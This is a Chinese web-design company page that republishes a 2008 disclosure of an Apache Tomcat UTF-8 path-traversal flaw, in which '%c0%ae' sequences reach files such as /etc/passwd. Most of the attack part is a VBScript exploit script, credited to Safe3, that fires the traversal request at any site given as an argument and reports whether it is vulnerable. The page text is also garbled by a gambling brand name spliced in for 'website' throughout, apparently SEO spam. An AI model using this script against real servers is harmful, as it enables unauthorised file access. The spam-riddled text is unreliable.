青海龙8国际乐建设、网络推广最好的公司--您身边的龙8国际乐建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁龙8国际乐建设、龙8国际乐制作公司-西宁威势电子信息服务有限公司
 
西宁威势最新龙8国际乐制做案例展示
Lastest Project
 
当前位置为:首页 >> 操作系统 >> 正文  
龙8国际乐_龙8国际娱乐电脑版_龙8国际娱城手机版

文章来源: 西宁威势电子信息服务有限公司     发布时间:2008-10-26    浏览次数:2604    tags:Apache Tomcat UTF-8编

漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括

/etc/passwd等

触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项

漏洞测试代码如下:

Dim strUrl,strSite

showB()
Set Args = Wscript.Arguments

If Args.Count <> 1 Then
ShowU()
Else
strSite=Args(0)
End If

 strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"

 Set objXML = CreateObject(" Microsoft.XMLHTTP")
 objXML.Open "GET",strSite & strUrl, False
 objXML.SetRequestHeader "Referer", strSite 

 objXML.send()

if objXML.status=200 then
 wscript.echo("存在漏洞")

end if

 

Sub showB()
With Wscript
 .Echo("+--------------------------=====================------------------------------+")
 .Echo("Exploit Apache Tomcat UTF-8")
 .Echo("Code By Safe3")
 .Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
 .Echo("+--------------------------=====================------------------------------+")
 .Echo("用法:")
 .Echo(" cscript "&.ScriptName&" site")
 .Echo("例子:")
 .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt")
 .Echo("+--------------------------=====================------------------------------+")
 .Quit
End with
End Sub

评论列表
正在加载评论……
  
评论   
呢  称:
验证码:
若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
乘车路线    汇款方式   加盟合作  人才招聘
 
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!